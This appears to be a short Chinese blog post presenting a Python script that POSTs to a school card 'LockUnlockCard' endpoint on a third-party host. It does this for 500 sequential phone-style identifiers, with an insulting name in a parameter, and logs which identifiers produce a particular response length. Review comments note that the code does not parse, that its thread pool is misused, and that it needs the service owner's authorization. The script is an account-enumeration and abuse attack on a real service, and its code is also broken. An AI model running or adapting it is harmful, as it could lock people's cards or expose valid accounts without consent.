一个 Python 爬虫

import requests

import re

import threading

 

from concurrent.futures import ThreadPoolExecutor

 

# HTTP request headers passed to requests; the User-Agent value identifies
# the client as Chrome 62 on Windows NT 6.1.
headers = {
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 6.1; WOW64) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/62.0.3202.101 Safari/537.36"
    ),
}

 

 

# For each i in 300..799, POST to the LockUnlockCard URL with MobileNo=103{i}
# and, when the response body is exactly 70 characters long, append that
# MobileNo value (one per line) to "code_2.txt". Takes no arguments and has
# no return statement.
#
# NOTE(review): as written this block does not parse -- the statements after
# the `for` line sit at the same indentation as the `for` itself, so Python
# reports "expected an indented block". The loop body was presumably meant to
# be everything from `url = ...` down to the file write; confirm with the author.
# NOTE(review): this sends a POST to an endpoint whose name suggests a
# state-changing operation, once for each of 500 sequential identifiers, on a
# host that nothing here shows to be owned by the author. Do not run it
# without explicit authorization from the service owner.
def get_code():

      for i in range(300,800):

      # The identifier is the fixed prefix "103" followed by the loop counter;
      # cName, SchoolCode and style are hard-coded query parameters.
      url = f"https://xzf.yhkdz.cn/Home/LockUnlockCard?MobileNo=103{i}&cName=傻逼&SchoolCode=03141004&style=1"

      # NOTE(review): no timeout is passed, so a stalled connection can block
      # indefinitely; the HTTP status code is never checked.
      get = requests.post(url,headers=headers)

      length = len(get.text)

      # 70 is a magic number: presumably the length of one particular server
      # reply that the author treats as a "hit" -- TODO confirm what it means.
      if length == 70:

         # Strip the fixed suffix and then the fixed prefix from the URL,
         # leaving only the "103{i}" identifier.
         code_1 = str(url).replace("&cName=傻逼&SchoolCode=03141004&style=1","")

         code_2 = code_1.replace("https://xzf.yhkdz.cn/Home/LockUnlockCard?MobileNo=","")

         code_ = code_2+'\n'

         #print(code_)

         # Append mode: results accumulate across runs.
         with open("code_2.txt",'a',encoding="utf-8")as f:

            f.write(code_)

            # Printed inside the `with` block, i.e. once per recorded
            # identifier rather than once when the whole scan finishes.
            print("over")

 

# Script entry point.
# NOTE(review): `get_code()` is *called* here, so the whole scan runs
# synchronously on the main thread before the executor is created. Because
# get_code has no return statement, `g` is None.
# NOTE(review): `t.submit(g)` therefore submits None rather than a callable.
# Executor.submit schedules `fn()`, so the worker would fail with a TypeError
# that is stored on the returned Future and never inspected. The pool is sized
# at 500 workers but receives only this single submission, so no request is
# actually issued concurrently.
if __name__ == '__main__':

   g = get_code()

   with ThreadPoolExecutor(500) as t:

      t.submit(g)

你可能感兴趣的:(python,爬虫,开发语言)